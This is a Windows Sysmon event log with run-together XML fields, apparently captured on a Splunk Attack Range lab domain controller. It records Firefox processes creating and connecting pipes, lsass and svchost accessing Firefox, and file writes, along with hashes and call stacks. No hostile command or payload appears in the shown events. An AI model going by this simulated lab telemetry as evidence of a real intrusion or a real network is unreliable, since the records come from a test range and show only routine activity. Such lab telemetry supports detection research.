Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f07d|C:\Program Files\Mozilla Firefox\firefox.exe+2e285|C:\Program Files\Mozilla Firefox\xul.dll+1fd1d9a|C:\Program Files\Mozilla Firefox\xul.dll+a04e9a|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.240{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.5.359101359\258260543" -childID 3 -isForBrowser -prefsHandle 2860 -prefMapHandle 2856 -prefsLen 1769 -prefMapSize 235910 -jsInit 1076 285716 -parentBuildID 20210922161155 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2868 2b092f54738 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92LowMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000105091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.5.35910135C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d5e|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 10341000x8000000000000000105086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d37|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 10341000x8000000000000000105085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d0c|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 18141800x8000000000000000105084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.214{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.4.12198711C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+1b80fc|C:\Program Files\Mozilla Firefox\xul.dll+a15446|C:\Program Files\Mozilla Firefox\xul.dll+a0ffef|C:\Program Files\Mozilla Firefox\xul.dll+19ce81f|C:\Program Files\Mozilla Firefox\xul.dll+19ccfc1|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.4.12198711C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.2.115647830C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.214{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.214{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD97ECEC815A4952B842D60E41DEB4C,SHA256=255444D16D362ED020120BB957CFC8F174B91BC2709D5497443A560CB5E47996,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.198{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.198{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.3.203765694C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.198{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+1b80fc|C:\Program Files\Mozilla Firefox\xul.dll+a15446|C:\Program Files\Mozilla Firefox\xul.dll+a0ffef|C:\Program Files\Mozilla Firefox\xul.dll+19ce81f|C:\Program Files\Mozilla Firefox\xul.dll+19ccfc1|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.198{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.198{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.3.203765694C:\Program Files\Mozilla Firefox\firefox.exe 18141800x8000000000000000105071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.198{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.1.60406317C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.183{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.183{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.183{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walMD5=A86E76E4504CC3769052411C2E8F32A3,SHA256=F8B81B381AF9060B00164C034E33DBE0A34C5D6884CB7D7D9C2BDCCB9F6D5F05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.167{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=5B5B121C69912E7B561924B2E7B2B023,SHA256=946494EA6508A3036270ECD479669657418705B572C6063EC973589B5C8F360A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e49022|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7 10341000x8000000000000000105065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla 